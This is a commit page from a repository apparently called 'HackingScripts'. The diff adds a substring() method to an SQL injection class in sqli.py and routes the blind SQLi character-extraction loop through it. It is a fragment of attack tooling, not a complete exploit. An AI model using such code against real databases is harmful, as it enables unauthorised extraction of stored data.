Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

SQLi: custom substr method

Browse Source
This commit is contained in:
Roman Hergenreder
2025-12-08 12:35:56 +01:00
parent 6cd353b911
commit 43b1a0ebc6
1 changed files with 4 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
sqli.py
View File

@@ -35,6 +35,9 @@ class SQLi(ABC):
return rows return rows
def substring(self, what, offset: int, size: int):
return f"substr({what},{offset},{size})"
@abstractmethod @abstractmethod
def ascii(self): def ascii(self):
pass pass
@@ -207,7 +210,7 @@ class BlindSQLi(SQLi, ABC):
cur_str = "" cur_str = ""
while True: while True:
found = False found = False
cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))" cur_column = self.ascii() + "(" + self.substring(column, len(cur_str) + 1, 1) + ")"
if charset: if charset:
query = self.build_query(cur_column, table, condition, offset) query = self.build_query(cur_column, table, condition, offset)
for c in charset: for c in charset: